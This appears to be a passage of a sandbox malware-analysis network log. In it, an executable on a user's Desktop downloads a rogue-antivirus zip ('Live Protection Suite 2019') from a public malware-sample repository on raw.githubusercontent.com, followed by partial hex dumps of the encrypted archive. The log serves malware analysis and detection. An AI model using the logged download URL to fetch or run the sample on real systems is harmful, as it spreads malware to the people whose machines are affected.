                                                                                                                                                2022-09-29 12:51:42 UTC16022INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                43192.168.2.549743185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:42 UTC16024OUTGET /Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:43 UTC16024INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1034690
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "cb139afe4c1955d7d4f5f579332cf5b73b6b41a8bade4f3525f8981ea9eb4a4c"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0807:E97B:385959:3EF852:63359357
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:43 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6967-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455903.950635,VS0,VE168
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 651008b7d2d4ef2c33645fb5c6e8629c6dd3c67f
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:43 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:43 UTC16025INData Raw: 50 4b 03 04 14 00 01 00 08 00 ea 63 c8 4e 15 34 5b be 10 c9 0f 00 81 0b 12 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4c 50 53 32 30 31 39 2e 65 78 65 ec d2 bd 62 0f 4a 20 02 12 e6 89 4d 18 db 9b 9b dc 10 ae 89 ba 6b bf 4c 81 2a cc b4 82 28 9f 20 07 bb 53 a7 78 f3 2a 58 30 eb c9 eb da e8 3e b8 db 0b 27 6b 8e bc 16 6f 81 74 e9 9e 43 a0 32 be 9d dd de ca e8 fe a6 ef 69 fe e3 7f da 29 bd 73 2b a9 ea a0 32 1b 74 2f c9 db 66 e4 65 eb 0f e5 29 e6 e4 b5 0b 26 ec d0 98 45 d0 1c 5a d1 f5 79 bc d8 62 a8 26 8c c3 e4 63 82 f2 86 11 ca c4 a8 76 03 a7 cb 3e 0b 8c 64 60 7b 93 9c a1 c0 f5 56 b8 92 ef 87 91 32 db c2 91 d2 90 e3 1b f4 a9 54 2f 97 37 85 a9 fb c5 b5 67 69 1a 4c af f5 05 f1 35 0c d0 b7 ad 42 3e fb 35 e8 f1 e8 c0 cf 21 be 38 51 be 0b ca 4b 54 a5 4c 9a c4
                                                                                                                                                Data Ascii: PKcN4[Endermanch@LPS2019.exebJ MkL*( Sx*X0>'kotC2i)s+2t/fe)&EZyb&cv>d`{V2T/7giL5B>5!8QKTL
                                                                                                                                                2022-09-29 12:51:43 UTC16026INData Raw: 32 9b c9 08 5a 04 0f 82 c0 ec 15 18 4c 01 0f 3a 1d 5d 1e fd 70 44 62 9b 15 66 04 55 3b 57 80 5f ac 21 bb 42 10 b8 c1 d7 e1 3e a1 5e 37 85 a8 2b 6c 16 35 7c 6a 36 d0 a6 a1 b2 75 3c 19 ad df 7b cd 02 e8 35 d1 e7 6b 44 bc 98 b1 4d 29 5e ee 2f 25 95 13 98 b2 67 83 72 dd 88 1d 62 4e 0c ef fd 6c b7 11 54 ef 1e ec 63 20 54 fb 7f e3 b0 4b 0b c4 b5 56 c2 b4 b0 83 cd 32 e5 23 65 40 41 d8 66 6f 01 81 1c 7a 46 77 ad 5d 88 38 6a d2 ca 55 84 bf a6 4a 4c 0c 80 b1 52 96 4f ac 77 48 a7 1f 12 59 58 6c f9 f7 0c 38 7a ac fc 3a 8c 1f ca df 56 09 d6 fd 9b 42 6d a7 7c 46 b9 16 13 6f b6 39 56 1e fc 34 ed 5f c2 db ea 28 13 85 0e 91 6b 4d 6f bf c5 83 4c a1 cd 3f 24 58 aa ef 8b 98 c8 b5 a8 b7 e7 18 99 34 d9 2a 99 ef 6b 2e 99 a3 c7 b7 0a 75 da da 89 b5 a3 ce e9 6c 03 cc 92 20 28 29
                                                                                                                                                Data Ascii: 2ZL:]pDbfU;W_!B>^7+l5|j6u<{5kDM)^/%grbNlTc TKV2#e@AfozFw]8jUJLROwHYXl8z:VBm|Fo9V4_(kMoL?$X4*k.ul ()
                                                                                                                                                2022-09-29 12:51:43 UTC16027INData Raw: ea 55 a5 f1 13 72 53 35 c8 76 0b d7 3a 8a 4a ec 08 8c 42 5b 06 39 6c 39 f8 c3 8a 06 5f 4f 26 cb 14 22 4d e3 c8 19 e2 c4 0f 45 3e a5 10 27 0f be f7 f7 88 16 4a 6b 33 3f b3 35 71 8e d3 18 d1 f7 77 b8 59 4f 7b c6 6d 6e 9f 10 8c 34 6b d8 90 f3 18 e0 2b 39 23 d5 8e 17 d3 90 c1 85 07 79 8d bb cc c7 90 63 cb 55 f9 47 5c 6c ab 8c 75 ae f2 08 47 5e 0c 4e 35 31 b2 0e d8 19 fb f1 3e df fa a0 35 98 61 62 66 89 4c 22 0c 9e 14 4d 89 08 54 e5 71 56 4e 9b 2f 84 3d 29 23 59 9e fd d9 eb 41 d9 48 68 13 44 85 42 f8 36 97 f0 2b 58 fb 35 95 16 ad ad 36 f9 79 f8 ee da cd 67 22 5f e8 77 16 71 d7 1f df 97 93 60 ce db 54 51 1b 38 02 bd b6 03 2b e0 ba ae 1e 25 8f 14 ad e5 73 d6 9e 48 af 40 0e ab 49 9a 6f 3b c9 53 1e 4d 09 bb 15 be 01 68 d2 01 21 56 e9 53 d5 47 1c bd 9a d6 3b cd b7
                                                                                                                                                Data Ascii: UrS5v:JB[9l9_O&"ME>'Jk3?5qwYO{mn4k+9#ycUG\luG^N51>5abfL"MTqVN/=)#YAHhDB6+X56yg"_wq`TQ8+%sH@Io;SMh!VSG;
                                                                                                                                                2022-09-29 12:51:43 UTC16029INData Raw: 85 73 eb fc e0 1d cc 80 8b 2a f7 7b 1e ab 9a b0 1f f4 50 54 a1 bb c0 2c 89 37 44 e6 89 53 79 78 23 17 68 30 8a 36 9f 1d e1 dd e2 81 d6 d4 87 30 57 4a 15 0f 25 16 d0 0e 98 dd 2e 5f 36 33 a3 05 06 fe de b9 1c 91 a2 ef d3 68 17 2d b4 46 f4 04 2d 31 06 5a 12 d9 5b 00 09 8f f6 35 a7 2f b2 1c 18 ae 94 ae 67 fc 14 66 7d b2 fb d7 be b5 f4 ca 4f 23 be 1d 1f 0a 79 46 09 ed 58 0d 9d b3 3e 58 20 3c 85 bd 53 bc 05 29 33 db ce fa 67 18 dd 7c 2e f4 4f 7b 9d 05 bf 18 d8 c3 7d ac e5 44 a8 e4 b2 cd 63 66 20 22 92 e3 1d 87 48 29 70 db 5f b6 a3 7b 74 f4 53 8e 8d 12 4c 78 d7 96 cb d4 f9 b1 8e 72 ce ad ad ae f6 63 2d 24 e4 ec 07 36 52 1a 14 49 f2 b9 31 e4 22 18 e7 62 71 84 e9 74 79 87 65 1a b9 ae 87 c6 36 52 c7 58 08 ab bf 7e a1 ea ec d5 5d 87 87 8d 17 1e 7e 7a 03 6a eb d3 47
                                                                                                                                                Data Ascii: s*{PT,7DSyx#h060WJ%._63h-F-1Z[5/gf}O#yFX>X <S)3g|.O{}Dcf "H)p_{tSLxrc-$6RI1"bqtye6RX~]~zjG
                                                                                                                                                2022-09-29 12:51:43 UTC16030INData Raw: 6e 7d e7 38 f3 13 d8 3d 48 d7 95 cb b2 80 f1 2b f1 ea 72 0f 91 56 f6 f0 1a dd 9b cc a5 ad e1 89 d6 05 6a 07 a2 23 76 2e 50 22 3c 67 cf ec 2c be a8 1b 67 18 9c 4e e0 82 42 d6 4f b9 ed 97 a7 f7 83 5a 8d 0d d3 cd fb f0 20 c6 47 fa 07 ba 87 09 92 66 f8 e8 81 c2 e3 76 48 63 48 b6 ac d9 ea 01 77 48 e7 7a 02 5a 53 be ed 12 6f 4a 3d 52 8b 4b 8d f9 d7 d1 7d f1 77 58 1c 3a 71 84 ef d3 0b 12 8d bb 72 ba 58 ec cd 7a e5 f3 e5 ea 6c 97 97 56 35 06 b4 b5 94 c9 16 c2 13 cd 8e 96 29 92 3d 9d 11 36 bd 8c 12 9c f9 30 8b 17 82 8e 3f f5 17 a5 bc ce 9d b2 8c 17 6d c2 a8 54 d8 cf 85 1d 01 a7 7a f1 70 7d 90 16 bf d7 d2 07 12 62 83 3d 78 bf 1a 1f a9 03 49 2d f9 e3 2b 1d 37 2d 96 a9 37 da 27 f4 97 7f 6d 74 72 e1 11 0a 03 b6 8d 1b a9 08 94 58 83 7a b1 58 fd 98 92 06 d2 30 39 a2 ff
                                                                                                                                                Data Ascii: n}8=H+rVj#v.P"<g,gNBOZ GfvHcHwHzZSoJ=RK}wX:qrXzlV5)=60?mTzp}b=xI-+7-7'mtrXzX09
                                                                                                                                                2022-09-29 12:51:43 UTC16031INData Raw: d3 a4 e6 8a 00 1e 9a 1b de 55 07 da e3 2c a8 50 a7 a4 38 c0 42 67 7a 51 36 eb a3 d1 35 16 21 da fc 50 3e dd 98 54 63 47 01 93 26 a5 1e df 5c b7 3d 94 e7 0f e2 08 f7 bf 3f 17 51 4f 25 27 97 76 61 cb 97 57 b1 f7 92 fa f9 00 8a 20 00 0a 8e 43 f6 b8 62 1a 75 c5 4b 08 7f 44 46 4e 31 d3 2c 93 13 2e 98 00 5d 51 1c 1f 3e 06 80 52 68 09 a7 36 12 94 cb 9b c3 ec da 3c ff cd 28 98 78 75 36 2c 8f 6b da cb c9 91 0b 96 29 1a 4f 20 b0 68 84 2c a0 a8 d7 93 01 b5 bd a1 4d 25 16 0e 01 62 55 fe f9 1e b0 f9 47 d9 a5 06 04 12 ac ef 98 39 9c 45 ec dd d9 7d 41 f8 5b f7 57 5e 5b f7 2d 46 ce 29 5f 3f c5 77 2b da 94 44 1a 5e f8 f9 00 ca 88 e5 19 22 19 5c fc 48 27 38 22 ba ae 04 23 25 a7 15 33 c3 c0 08 71 2c 53 4e 7d cc 7a 0a 64 3a 64 e8 67 80 d9 10 1a ca 4d 0f 59 39 fa 79 6d 85 b8
                                                                                                                                                Data Ascii: U,P8BgzQ65!P>TcG&\=?QO%'vaW CbuKDFN1,.]Q>Rh6<(xu6,k)O h,M%bUG9E}A[W^[-F)_?w+D^"\H'8"#%3q,SN}zd:dgMY9ym
                                                                                                                                                2022-09-29 12:51:43 UTC16033INData Raw: fd cd b1 ed cb 92 89 7b 39 92 f5 25 93 f1 92 16 91 2f 9c 14 54 72 b1 c1 35 90 04 29 42 ef b4 db f5 4b 67 8a c3 56 83 ef d1 be 06 38 5b 03 80 ed cd a3 e6 75 a6 1b 2b b8 41 7e 65 6e 95 4d 91 5f f6 65 ff 2b 40 80 5b a2 da 8b 33 af 47 7c 64 f9 1f fb 35 08 10 20 48 bd 68 5b c5 c5 e5 88 d0 46 e5 65 31 7b 9b 28 02 19 cd 71 51 56 5f 1c 4c ea cc a7 69 98 4a 35 ec fb 22 37 ae dd 34 56 b5 d6 63 37 f7 77 bd ed 64 fb 28 32 a0 4a a3 4d e8 d5 c3 7f 8b 02 9c da be 5d 9c d8 4d d7 ff 46 26 8f 71 cb 9e f6 df 94 be d3 f7 ae 0d 93 f9 eb 41 b8 d8 bb 3d 7c ba 0f 8c c1 dc 08 6e 5c a5 13 6f 81 04 89 fd db eb 84 4f 06 e6 77 6c ad 83 d7 eb e1 4c 4e 55 57 9a af cd 98 fd e3 5d e5 bc 3e de 0b ab d7 6a 12 77 1e 7e 24 68 d9 4c 14 09 14 59 41 60 04 29 d3 1c a5 47 98 b4 07 9d 37 ab 76 d9
                                                                                                                                                Data Ascii: {9%/Tr5)BKgV8[u+A~enM_e+@[3G|d5 Hh[Fe1{(qQV_LiJ5"74Vc7wd(2JM]MF&qA=|n\oOwlLNUW]>jw~$hLYA`)G7v
                                                                                                                                                2022-09-29 12:51:43 UTC16034INData Raw: 48 bb 71 e8 63 d2 bc 53 7e 28 b5 86 20 c8 8d bc 96 1d fb a5 79 18 94 c5 9c 53 53 2f 8f 18 15 07 7f 4e 10 13 7f c9 7d 0e db f8 48 82 b1 1b 13 4b 3b fc 1d a5 2e d9 6d 26 de 19 bb 40 2f 35 94 6a cd 61 02 46 08 b0 25 a9 33 26 a6 70 38 cb 1e c5 b8 1d 62 64 17 8e 58 d3 9c c0 94 be 6b f5 5d 28 57 6a 18 9b df f8 f7 75 07 b9 a0 10 9a cd e8 54 e8 9b 28 76 b4 81 8a 6d 00 b1 2f ea df 03 b9 29 c2 97 c8 48 24 6e 46 c3 8f 65 30 8a d7 e1 6c f3 ac a8 c4 70 a2 7b b8 5c 86 bb 8f 7b b7 9f 25 e8 09 f7 ae 4d a0 9f ec 32 3a 95 04 37 d0 86 d5 6b 8c 50 f1 26 4d 77 cf 17 fa 45 71 cb fe 7f 89 1f bc cd 78 b2 7c c5 b3 6c 4a b2 f9 56 34 07 c2 e4 29 4c df ef 5c 4a 5d 83 2c b5 a5 cf 4a 6c 11 be 6b 71 a6 fc f8 96 71 f4 05 e4 b6 c4 96 d6 c6 be 4b 42 47 4e 2b b0 53 8f 0f 0f 89 1b 44 15 78
                                                                                                                                                Data Ascii: HqcS~( ySS/N}HK;.m&@/5jaF%3&p8bdXk](WjuT(vm/)H$nFe0lp{\{%M2:7kP&MwEqx|lJV4)L\J],JlkqqKBGN+SDx
                                                                                                                                                2022-09-29 12:51:43 UTC16035INData Raw: 24 06 ed 54 d0 b8 62 ab b7 a1 3b eb 7b 98 87 3b 3d 1c e9 35 d8 17 f9 6c c4 6d 5d ec 21 5a 39 a5 80 21 2a 7d a8 0f 50 b1 a4 7c ec 4f ff 84 40 b7 73 d9 46 d4 b8 06 5d 79 be 0a 87 28 3f d9 36 29 ec 1d f5 41 ac 69 57 5c 43 42 f6 bc 36 90 f6 0f ae 2b 73 21 47 32 67 d6 fa 21 6d 3b b6 4a 7b 36 82 fa 31 f4 d6 bf de 42 33 b2 a5 f0 6d fc 88 53 82 eb f1 65 6a 5f e5 ee fc 2d 44 fe 5a 19 56 2c 88 d1 58 91 c0 6c 1b 16 25 71 fc 50 78 30 1f d6 6c e5 ee 2b c8 34 87 ae ae e1 71 e0 23 e0 90 d6 a5 7d a9 2c 9e 36 22 70 d0 5d d3 c6 48 7a 08 1d d8 15 11 4c 3f 6e a8 ee 8b bc 51 af 41 be 5f f2 8c 05 74 b6 88 f7 cd be 90 37 00 f5 e3 a5 43 16 3f 00 0b b7 b8 94 98 bd b1 2a 2b 6a d3 83 8d 21 ce 97 0a 31 b5 49 f4 31 18 f0 00 35 0d 5a b3 59 99 cc 5b af 6d 80 67 90 82 7f 62 6b 5e 55 0e
                                                                                                                                                Data Ascii: $Tb;{;=5lm]!Z9!*}P|O@sF]y(?6)AiW\CB6+s!G2g!m;J{61B3mSej_-DZV,Xl%qPx0l+4q#},6"p]HzL?nQA_t7C?*+j!1I15ZY[mgbk^U
                                                                                                                                                2022-09-29 12:51:43 UTC16037INData Raw: 8e da de 8e f0 0d 6f 00 6c 2e 80 98 72 56 3a 9a 45 9a c0 49 d9 a3 ce 33 d1 26 c3 23 95 29 05 7d 9d ad ce 38 e7 6c 02 a8 35 26 2e ee 7e 00 c6 0a fd fb 07 e5 40 ec c5 db c9 f7 8a 8b 79 2a cc 50 d6 cf 56 0d a0 5e f7 68 b0 c7 df ed 5d 0a cd 79 e6 36 d3 90 6f 26 b1 4a 75 fe a1 a0 eb 14 55 79 ec f0 c1 f0 d4 50 15 4f e0 24 1d d4 06 a5 43 56 12 4d 30 41 82 83 2d a1 dc 56 cb 37 19 d6 d2 ba 09 13 cb 0f de 5a 47 59 5a 4f c5 ff 6f ce fb 9b 72 9a bf fd c3 74 09 c5 d7 60 57 9d 99 15 93 9b fb de d5 47 4f 3f 8d c9 55 aa d3 b7 1f d2 20 a1 4f 21 15 50 24 af 37 64 17 ad 03 c0 8b 8e 60 bd c7 2a b2 91 a0 ba b9 82 fa 6a 36 33 b2 e0 77 2a 67 5c a2 10 85 30 8f 4a 91 d3 2f 0a 0e bd 4d b0 15 67 77 20 e0 2a 00 2f 1d 41 ce 4a ff ee 99 3d 74 87 a7 47 10 e6 0a f7 ca bd 8a d7 97 56 78
                                                                                                                                                Data Ascii: ol.rV:EI3&#)}8l5&.~@y*PV^h]y6o&JuUyPO$CVM0A-V7ZGYZOort`WGO?U O!P$7d`*j63w*g\0J/Mgw */AJ=tGVx
                                                                                                                                                2022-09-29 12:51:43 UTC16038INData Raw: 85 75 92 1d 12 ad 99 c5 f2 4d da 41 bd 45 05 c1 63 37 cf b2 f5 a7 10 e6 60 ba 48 93 d1 d4 f1 e4 1a d7 01 2a 53 69 7c c2 39 c7 46 1d aa ca 4c 9f 26 d8 b7 33 ec f3 5f 44 c0 7d d0 65 bc c7 77 58 3d 56 4b dc ab ed a0 d0 ba 2b 1a c9 7f ae bc ec 45 0d ab 4e 1d aa 08 8c 1f d1 f6 5e 26 7e 79 42 e9 f6 84 8a 29 bc c6 a0 fb 16 6e fc fc 4e 24 0d 25 8e 8d 95 d4 38 1a f8 78 13 c3 71 09 53 e7 37 81 b7 cc 65 6d 53 26 b9 91 38 1e 1a a4 e6 58 88 03 9a 3b 1a 99 65 18 38 72 ff 5a 8f 5d c3 07 b7 2d c8 ac 8a a6 b8 83 e6 d7 6b 2e de 7c 91 35 cc 54 c3 7f 48 34 71 2d e2 77 1c 1b 76 7c 3f be fd 0f 24 53 ee 59 ab db 01 ad 08 fc 6e 37 b7 9a 3f 1d cd e4 a8 e2 f1 5f 15 ae 64 2f c6 9e c3 61 f2 d9 a3 92 6e ed 13 3d aa 61 83 e3 d1 e2 ed da 07 46 b3 c8 06 e3 08 f6 28 d3 55 28 14 00 c8 16
                                                                                                                                                Data Ascii: uMAEc7`H*Si|9FL&3_D}ewX=VK+EN^&~yB)nN$%8xqS7emS&8X;e8rZ]-k.|5TH4q-wv|?$SYn7?_d/an=aF(U(
                                                                                                                                                2022-09-29 12:51:43 UTC16039INData Raw: fb cf 06 b7 97 c0 cf 5a 63 30 19 8b 0d 07 b4 33 6b d3 17 3f 3a a7 c2 a1 e7 9e c8 5f 58 28 fc 84 d6 ce 35 99 fa 9b 10 0d b6 5f 40 41 ce de b2 61 3a 84 c1 bf be 5f ee 61 0c 6f fe 7a f3 36 a6 0d ab 95 15 84 eb f6 f9 fb 72 d4 65 45 4b f9 33 74 bd 3c da 78 05 f0 97 47 c2 0e af 90 eb be 76 a5 1d cb 0f 3a 35 16 29 3c 63 5a 4b 8f c1 a5 29 56 6e 30 ab b2 25 36 1f 5d 5c f1 85 68 51 46 63 9f 05 17 e8 ab 57 9f 7c 09 8a fa 1c 7f 53 83 a4 f5 4c ca 9d 9c d2 f8 d9 4c e0 6d ae 92 a5 a0 be b6 25 0e 81 38 69 6d ee 22 39 3d 05 71 4d 0b 57 2c 2d 44 62 37 fc 82 bd 1f 03 ab 28 91 fa 43 05 d1 c7 d0 5a 6d c2 1c 7b a1 91 83 6a 77 72 b0 d6 c2 2c 35 23 50 24 09 fd b0 44 89 1e 57 d9 15 e3 bc c5 5e b6 6e d4 d8 56 12 76 8c f2 3f 47 eb da bd 4b 8d 36 1b 61 3c bb b0 23 42 03 25 5f e7 be
                                                                                                                                                Data Ascii: Zc03k?:_X(5_@Aa:_aoz6reEK3t<xGv:5)<cZK)Vn0%6]\hQFcW|SLLm%8im"9=qMW,-Db7(CZm{jwr,5#P$DW^nVv?GK6a<#B%_
                                                                                                                                                2022-09-29 12:51:43 UTC16040INData Raw: d9 60 f4 bb 9a 94 a6 a9 02 a9 fc 6e e5 34 8b e5 83 2b 0e de 53 f6 ec 5b c4 53 75 8c 3e 08 b0 4b 3f 2a 12 83 c8 b6 4b d1 38 9e 24 0c 65 d7 80 43 d6 ca 60 44 55 4d 3b e0 d3 4b 04 20 80 a6 d4 df 94 8b a5 3a c8 47 83 d0 7b bd a1 44 a5 90 b6 37 73 10 e6 29 79 43 00 67 b4 09 a5 b8 fb 86 0d fd 06 bb b0 57 c6 cc cb 66 9b f5 3d c0 14 09 b4 51 8e aa 4a e8 aa b4 51 ed 3e 12 ba b1 05 ba e4 df eb ec c4 4a a5 19 10 7f 43 82 e8 14 37 08 dc ca 2e 0a 90 29 40 08 42 95 95 83 2c c0 84 9b d6 f5 b3 22 0e 19 ab 51 6d ab 04 9a dc d5 b4 10 08 ae d4 81 7c 3d 35 33 a8 4a b8 7d 92 54 6e 63 ed 9a b9 74 5b cd 7c cc f4 16 f4 9c 7e f9 cc fe 5f 9a b3 a2 05 09 93 07 04 2b 25 64 a7 2f 59 3c d9 9e 0a 82 c9 85 4d 24 e3 75 e1 85 73 a0 0f bf 9f dd af 5d 3f 15 ba 44 dd f8 e4 10 f8 e6 a7 a1 af
                                                                                                                                                Data Ascii: `n4+S[Su>K?*K8$eC`DUM;K :G{D7s)yCgWf=QJQ>JC7.)@B,"Qm|=53J}Tnct[|~_+%d/Y<M$us]?D
                                                                                                                                                2022-09-29 12:51:43 UTC16056INData Raw: 31 95 57 a5 17 da 96 2b db f0 50 2e c1 bf 71 93 17 8b f8 50 56 d0 49 4c d7 f3 e8 4d 1e cc 9c 99 f6 2a c1 7a 21 e7 af fa fc 43 49 b5 e2 e4 3e af 84 c3 ad b8 bd a2 06 fa 5f b9 90 03 5a c6 76 01 c6 3f 0d 64 7f d9 c7 95 42 57 bc 9b 87 ba bc 06 20 15 ed 66 50 0c 5b 10 44 f2 5a f3 47 38 13 b8 aa b8 d9 fd 35 5d ca 04 d7 2c 38 12 ab f3 d6 4c be 36 23 8b 59 43 8f 09 81 bb 03 d7 47 a0 4f 28 f3 0e ac ad 8d 8d a2 65 d6 20 25 88 f8 9c 2e f3 60 89 f9 a4 77 2b 8c 9c eb 99 59 b5 d1 ac 7d 58 07 78 40 79 8a 1b ee c3 2f 6d 7e 83 33 28 c6 d8 08 72 8f cc fc 55 2d 9b d6 e3 c6 ad a4 9c 54 38 5a 19 8e 90 72 57 01 65 ad 84 83 ee d7 03 57 76 61 73 dc c4 69 c2 33 ae 61 9d 82 d2 9f f8 bd d5 95 2e 83 a1 82 20 de dd 1e 86 5c a8 c7 c7 03 ee e6 d5 19 1c 56 4b 9e f6 e0 40 0c 4c 8b f2 dd
                                                                                                                                                Data Ascii: 1W+P.qPVILM*z!CI>_Zv?dBW fP[DZG85],8L6#YCGO(e %.`w+Y}Xx@y/m~3(rU-T8ZrWeWvasi3a. \VK@L
                                                                                                                                                2022-09-29 12:51:43 UTC16072INData Raw: ed 0a 8e 2a 10 dc d0 15 58 11 a9 69 8a 99 ca 26 ea d0 42 0c 4f 8e b8 9a 9b ae a9 77 43 fb 63 42 13 d7 cf 54 01 97 df 81 e7 85 ed 72 d8 93 19 02 1d 82 c2 1d 53 c3 94 71 28 6f cc 37 f6 cd db 4a fa 2c 2d 11 6c 9d 12 06 81 63 2a 51 86 84 16 cc bd 62 4a 95 11 9c 49 17 15 e8 b5 31 16 e2 b0 1d a6 3f 7f b0 8c 01 27 5a a9 c2 65 42 b8 3f 37 7b 87 3d f4 0f fe 83 c0 2a f6 94 4b 71 43 e5 d0 b4 90 5f c8 6b 4c 48 d1 98 65 24 ec bf 30 88 5c f5 b1 f3 e5 85 0c 1b 1c 42 b7 1f 6b 65 8e 4e 6e b2 4c 41 13 d3 2f f1 58 04 85 59 17 14 5c 13 5a 97 82 5f 35 12 ba f5 2a 00 a6 f3 90 ce 3f 5d 5d 0b f1 5b 1e 50 d4 06 87 0c e1 55 75 a3 f3 cf 76 2a 19 d9 ca 69 d5 f7 d6 8e 9e d5 b2 4f 70 41 3e cd 44 b6 f5 45 00 49 39 60 f2 db c1 ed b6 42 6f d1 40 2a 58 75 51 38 d4 ba 7e 24 ad 03 bd 51 64
                                                                                                                                                Data Ascii: *Xi&BOwCcBTrSq(o7J,-lc*QbJI1?'ZeB?7{=*KqC_kLHe$0\BkeNnLA/XY\Z_5*?]][PUuv*iOpA>DEI9`Bo@*XuQ8~$Qd
                                                                                                                                                2022-09-29 12:51:43 UTC16088INData Raw: f2 46 a8 3c b2 92 f2 cd fc 8f 0f 2e 56 f8 54 df 66 d0 ca e8 86 22 24 ff 35 b9 02 60 f2 f7 d1 f8 96 27 65 db bc 4c c8 25 33 7e b8 ac 8a 14 d6 2e 3b 80 bc 9f e0 8c 6f 78 65 40 a6 ce 3c 59 9d 1b ef 5f 27 39 f2 4d 5b b4 d8 bb 00 32 e8 05 0d 36 7e 1d fc 0d e9 bf 03 87 dd 1c c6 4f 09 0d 46 82 99 e8 99 fc 7b 9d 2e 9e 07 62 c3 d9 61 28 31 70 0b 33 48 3f 3a 6f be 40 94 59 a5 06 9f b7 8e 04 17 e5 52 23 36 ab 9d 44 74 64 bd 67 2e 83 b7 ce 4d 36 5d a6 8e 50 40 05 78 aa cc a1 a8 aa 56 e4 be 3b fe d7 ee 6b 79 67 70 6d ce cb a8 cb e0 50 92 8f e3 97 cb 19 5d 31 e5 c4 ef 7e c3 d5 34 20 b7 cb b5 fa 0b 20 09 b1 bf dd ec 3a 48 f9 be 5b 87 52 0f 47 06 52 99 8b e2 69 ed d6 5b 95 13 11 f1 36 41 f0 4f 6b aa b6 07 3e 07 8d fd 28 a0 2c 26 f5 04 d3 d5 aa 28 9f bd f4 20 79 cb c7 3e
                                                                                                                                                Data Ascii: F<.VTf"$5`'eL%3~.;oxe@<Y_'9M[26~OF{.ba(1p3H?:o@YR#6Dtdg.M6]P@xV;kygpmP]1~4 :H[RGRi[6AOk>(,&( y>
                                                                                                                                                2022-09-29 12:51:43 UTC16104INData Raw: c5 74 09 c3 44 9d b1 66 0a 3b 81 65 2f eb d5 0c 85 40 84 9b d8 6d 2a e2 50 a6 2c 82 dd c1 32 7e 9f de dd 58 13 34 80 c0 f9 46 0a da c1 c0 93 bf 71 e4 45 2e 8d 91 d3 82 92 5b 3e 9b bd 46 31 39 6a d3 34 ac c8 2d a2 5b e8 82 17 c7 f0 93 2f 2d df bf 81 a0 80 87 b5 cb f4 df 19 d8 02 a9 45 4f 91 74 d4 64 79 d2 77 17 16 78 66 4f 75 b8 99 1c e9 89 f2 7b 48 52 fa 10 5e 06 3b 4b 27 fc df ac fb 96 57 0b cc 84 14 0f 01 9f 1b e8 8e 0c cc ba 56 14 cd d3 7c 26 10 d8 6f 72 af 90 58 d2 a4 57 e1 99 35 70 39 db a6 59 f2 af cb 1d 1b 58 62 e9 77 15 a6 10 3c 3e b6 ae f8 4a 66 d5 ac 73 ce 9b b6 de f6 27 3e 91 7d 9f e3 92 93 8b e1 ea 5b 03 0d 70 d5 b3 02 7d 93 b2 24 b5 c8 1d 7c a5 a1 7e 1c 09 36 10 b8 31 b8 8f e8 9c 91 0d 90 fd 33 79 81 da e7 d5 fe 8c 09 34 8b b0 de 1d e1 ae 55
                                                                                                                                                Data Ascii: tDf;e/@m*P,2~X4FqE.[>F19j4-[/-EOtdywxfOu{HR^;K'WV|&orXW5p9YXbw<>Jfs'>}[p}$|~613y4U
